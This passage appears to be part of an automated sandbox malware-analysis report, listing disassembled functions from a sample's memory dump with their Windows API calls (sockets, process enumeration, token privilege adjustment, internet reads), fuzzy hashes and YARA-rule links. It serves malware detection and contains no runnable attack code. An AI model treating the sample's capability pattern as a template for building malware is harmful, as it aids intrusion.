                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 923436eb0f81049c2ef060bfb5f1231480b2263656572c18be5caebce7f1daf6
                    • Instruction ID: 15a999e35d9b4dc667db3adcbf1d16b6a2ba1a86f6860c5c68ee3a6a1163df11
                    • Opcode Fuzzy Hash: 923436eb0f81049c2ef060bfb5f1231480b2263656572c18be5caebce7f1daf6
                    • Instruction Fuzzy Hash: 3A41A275640210AFEB10AB249C86F7E77A4EB45720F04C05CFA1AAB3D2CB749D01AB92
                    Function 00CF55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: a794f53b9dc5d87656de971581b27a5e6f03e062d79bdfde15b67bac94e2dd64
                    • Instruction ID: 6a4a3f0dfc1e3ef049427424264d30ad1fceb056b7d4fde635a34553e660b0eb
                    • Opcode Fuzzy Hash: a794f53b9dc5d87656de971581b27a5e6f03e062d79bdfde15b67bac94e2dd64
                    • Instruction Fuzzy Hash: 7911B6713009155FD7111F26DC44B7F77A8EF44721B458029F726D7341CB709A02CAA6
                    Function 00C83190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID:
                    • API String ID: 674341424-0
                    • Opcode ID: e84cce3df415b672e661492a3ed03dc500391cc828e247d8bd49d3ffecef1f91
                    • Instruction ID: 88b6d6e11e03e97e73b46f5fe98d4fe2992e4869424d90d1c585f139982e0e7b
                    • Opcode Fuzzy Hash: e84cce3df415b672e661492a3ed03dc500391cc828e247d8bd49d3ffecef1f91
                    • Instruction Fuzzy Hash: 1322AB716083419FC724EF24C881BAFB7E4EF84714F10892DF99A97291DB71EA04DB96
                    Function 00CEF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CEF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CEF15F
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00CEF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CEF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: d76aafac4f4bd462162f91054d7c57ffac4719d5ede1a61c592190818798c767
                    • Instruction ID: c9c84ff804d69ee1e1aac8788e4711bcfc6ff13d4fe24cdb7fe63d7addd3aca5
                    • Opcode Fuzzy Hash: d76aafac4f4bd462162f91054d7c57ffac4719d5ede1a61c592190818798c767
                    • Instruction Fuzzy Hash: 35517B715043009BD310EF20DC85A6FBBE8FF94710F10892DF599972A1EB70AA09DB92
                    Function 00CFC788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetCursorPos.USER32(?), ref: 00CFC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CABBFB,?,?,?,?,?), ref: 00CFC7D7
                    • GetCursorPos.USER32(?), ref: 00CFC824
                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CABBFB,?,?,?), ref: 00CFC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                    • String ID:
                    • API String ID: 1423138444-0
                    • Opcode ID: 6412352bcc4fb276bdb8ca6a4a279637cb0e5ff5eabfcc93c7133fcf92d0ba53
                    • Instruction ID: 7a95e16fb07909d5d04fda03b2c7908e2f3e4745f0ff0b58529daff88efcf5c3
                    • Opcode Fuzzy Hash: 6412352bcc4fb276bdb8ca6a4a279637cb0e5ff5eabfcc93c7133fcf92d0ba53
                    • Instruction Fuzzy Hash: 9C319E3560001CAFCB15CF59C8D8EFA7BB6EF09350F044069FA058B2A1C7369E51DBA1
                    Function 00CD40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD40D1
                    • _memset.LIBCMT ref: 00CD40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD4144
                    • CloseHandle.KERNEL32(00000000), ref: 00CD414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: af1c6bbebab155f3fe833a1030dfe00d4474f1fd500497eb9f9566b75feade09
                    • Instruction ID: ace67df2ae32cb756cd92e3d874c7e325d02d76a56f9efb1f014250f04b927bb
                    • Opcode Fuzzy Hash: af1c6bbebab155f3fe833a1030dfe00d4474f1fd500497eb9f9566b75feade09
                    • Instruction Fuzzy Hash: B61194759012287AD7309BA5AC4DFAFBB7CEF44760F1041AAFA08D7290D6744E84CBA5
                    Function 00C71290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00C712D8
                    • GetClientRect.USER32(?,?), ref: 00CAB84B
                    • GetCursorPos.USER32(?), ref: 00CAB855
                    • ScreenToClient.USER32(?,?), ref: 00CAB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                    • String ID:
                    • API String ID: 1010295502-0
                    • Opcode ID: 0659609f1fbcda1197a8c97123bfc23782818e4488f79faeb918f6194e1f3acd
                    • Instruction ID: 58c5577d920affead642994f21add2ef52e97c8514feed7d2a8ce0ecad11c46f
                    • Opcode Fuzzy Hash: 0659609f1fbcda1197a8c97123bfc23782818e4488f79faeb918f6194e1f3acd
                    • Instruction Fuzzy Hash: 22113A35900019BFCB00EF98D889AFE77B8EF05300F108456F915E7252C730BA52DBA6
                    Function 00CCEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CCEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: a3a3aaf094b3082e3032c8f6bc3451e316f819d207829b42de91d0c489350afc
                    • Instruction ID: 2f862137c7a6f43d2e9985079583ca2ced3d713ac8c2f76b710aace8ad12f930
                    • Opcode Fuzzy Hash: a3a3aaf094b3082e3032c8f6bc3451e316f819d207829b42de91d0c489350afc
                    • Instruction Fuzzy Hash: DD323675A006059FCB28CF59C491E6AB7F1FF48310B15C56EE8AADB3A1D770E981CB44
                    Function 00CE25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00CE26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: c96708974c088428d50691e0e70fab3496225f683b85408c90e403badf0deb26
                    • Instruction ID: 5247e430b9bd3ed0baca45180e5749b1ac5e3f620a0ee1373f22069bbdb72087
                    • Opcode Fuzzy Hash: c96708974c088428d50691e0e70fab3496225f683b85408c90e403badf0deb26
                    • Instruction Fuzzy Hash: 5941C371500389BFEB20DE96DC85FBFB7BCEB40768F10406EFA15A6140EA719E41A664
                    Function 00CDB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: fe45aca3eabfea97706331a8ed4b891b21d1b379c1265ebc7fed3ee3fc33b983
                    • Instruction ID: 8a4d5e00d2885a11e87baa58dfb7eb5c680057228a31cc924a068e484acb84ae
                    • Opcode Fuzzy Hash: fe45aca3eabfea97706331a8ed4b891b21d1b379c1265ebc7fed3ee3fc33b983
                    • Instruction Fuzzy Hash: C0217135A00118EFCB00EF65D880EADBBB8FF48310F1480AAE905EB351DB31A956DF51
                    Function 00CC8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                    • GetLastError.KERNEL32 ref: 00CC8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 8c634d09acdfe55f1e214634564051fa462a8be689a0ca58afdc757e4feeb8dc
                    • Instruction ID: 714d95bdf810443db2c99ed305b7ebb5680bbcdc75aed6d92c71af0274fd76a7
                    • Opcode Fuzzy Hash: 8c634d09acdfe55f1e214634564051fa462a8be689a0ca58afdc757e4feeb8dc
                    • Instruction Fuzzy Hash: 96118FB1414209AFD7289F54DC85E7BB7B8EF44710B20852EF45693251EF70AD45CB60
                    Function 00CD4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CD4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CD4C43
                    • FreeSid.ADVAPI32(?), ref: 00CD4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 8fd4cbffe2d56bffc3f2224183c133c0ac844804d70f6a2355062572018dcb55
                    • Instruction ID: 1ef7563e315b5de7ec819387c38ea5656f1d3b8e3636a1e4b45bab15e65bfaa2
                    • Opcode Fuzzy Hash: 8fd4cbffe2d56bffc3f2224183c133c0ac844804d70f6a2355062572018dcb55
                    • Instruction Fuzzy Hash: 60F03775A11208BBDB04DFE09C89ABEBBB8EF08201F0044A9AA01E2281E7706A048B51
                    Function 00C7E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6368e9a70a704e3acc632939c2e409b6e27e2c7eceff694b34551c548bcadf54
                    • Instruction ID: 77891f6739af032bd26f4e17e4046ece66594f5c51303f7bc7b104ab9ef39056
                    • Opcode Fuzzy Hash: 6368e9a70a704e3acc632939c2e409b6e27e2c7eceff694b34551c548bcadf54
                    • Instruction Fuzzy Hash: 8C22B172A00215CFDB24DF54C485AAEBBF0FF08300F14C1A9E86A9B351E731AE81DB91
                    Function 00C716DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetParent.USER32(?), ref: 00CABA0A
                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00C719B3,?,?,?,00000006,?), ref: 00CABA84
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$DialogNtdllParentProc_
                    • String ID:
                    • API String ID: 314495775-0
                    • Opcode ID: eed0d8e7881dee59f2d9c7d816a32b0beb4d8e8f2fd47a14ad79f7f680c326a9
                    • Instruction ID: 2a26776251119371a97172eb9504111f9bf5eb78cb3e39cd4a77daece22cd7bc
                    • Opcode Fuzzy Hash: eed0d8e7881dee59f2d9c7d816a32b0beb4d8e8f2fd47a14ad79f7f680c326a9
                    • Instruction Fuzzy Hash: 46217634604144BFCB248F6CC885EA93B96EF0A364F588254F9395B3F2C7319E51E760
                    Function 00CDC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC966
                    • FindClose.KERNEL32(00000000), ref: 00CDC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 94ea81d98a9068f7fdcfaa596f56c5b27a5055e63b07e41332d8af3093a7aa90
                    • Instruction ID: e265e57c6c43420f02832cc52735bca670970790d8d5b4d1820940bcc8ff19a4
                    • Opcode Fuzzy Hash: 94ea81d98a9068f7fdcfaa596f56c5b27a5055e63b07e41332d8af3093a7aa90
                    • Instruction Fuzzy Hash: 24115E726106009FDB10EF29D885A2AF7E9EF84324F00C51EF9A9D73A1DB30AD05DB81
                    Function 00CFC86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00CABB8A,?,?,?), ref: 00CFC8E1
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFC8C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                    • String ID:
                    • API String ID: 1273190321-0
                    • Opcode ID: 0a355dd991b1ee06359977df16b0f744726b50e8af673576714d8cb69e409b00
                    • Instruction ID: e2053491652ab16dce19fcb849c332bdfcd67ff09156b29e87ee5dae3115498c
                    • Opcode Fuzzy Hash: 0a355dd991b1ee06359977df16b0f744726b50e8af673576714d8cb69e409b00
                    • Instruction Fuzzy Hash: E201D83130020CBBCB215F14CD84F7A7BA6FF89364F144028FA554B2E0CB719802EBA2
                    Function 00CFCC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00CFCC51
                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00CABC66,?,?,?,?,?), ref: 00CFCC7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
